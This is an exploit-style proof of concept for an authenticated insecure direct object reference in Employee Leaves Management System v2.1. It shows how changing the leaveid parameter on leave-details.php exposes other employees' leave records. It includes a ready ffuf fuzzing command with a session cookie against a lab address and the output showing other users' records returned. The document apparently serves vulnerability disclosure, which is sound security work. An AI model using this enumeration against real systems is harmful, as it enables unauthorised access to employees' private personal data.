# Exploit Title: Employee Leaves Management System (ELMS) v2.1 - Authenticated Insecure Direct Object References (IDOR) # Date: 2025-03-04 # Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un # Vendor: https://phpgurukul.com/employee-leaves-management-system-elms/ # Demo Site: https://phpgurukul.com/?sdm_process_download=1&download_id=7175 # Tested on: Kali Linux # CVE: N/A PoC: 1. Login as a employee 2. Go to leaves tab and you will see your own leaves there. Here you can see the details of your leaves when you click on "view details" button for your own leaves. However, you can see the leaves of any user by changing the leaveid parameter here (leaveid=11) 3. try it another leaveid http://10.0.2.15/leave-details.php?leaveid=12 4. read all of the leave contents of the another user 5. Fuzzing: ############### ############### ############### ############### ➜ ~ ffuf -c -ic -w leave_ids.txt -u http://10.0.2.15/leave-details.php\?leaveid\=FUZZ -H 'Cookie: PHPSESSID=9c73627bf340b4a369310b69ba48e325' -fw 3139 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://10.0.2.15/leave-details.php?leaveid=FUZZ :: Wordlist : FUZZ: /home/t00r6x0/leave_ids.txt :: Header : Cookie: PHPSESSID=9c73627bf340b4a369310b69ba48e325 :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response words: 3139 ________________________________________________ 12 [Status: 200, Size: 11186, Words: 4521, Lines: 233, Duration: 9ms] 11 [Status: 200, Size: 11177, Words: 4522, Lines: 233, Duration: 980ms] 13 [Status: 200, Size: 11148, Words: 4517, Lines: 233, Duration: 991ms] ############### ############### ############### ############### leaveid=12 and leaveid=13 do not belong to my user.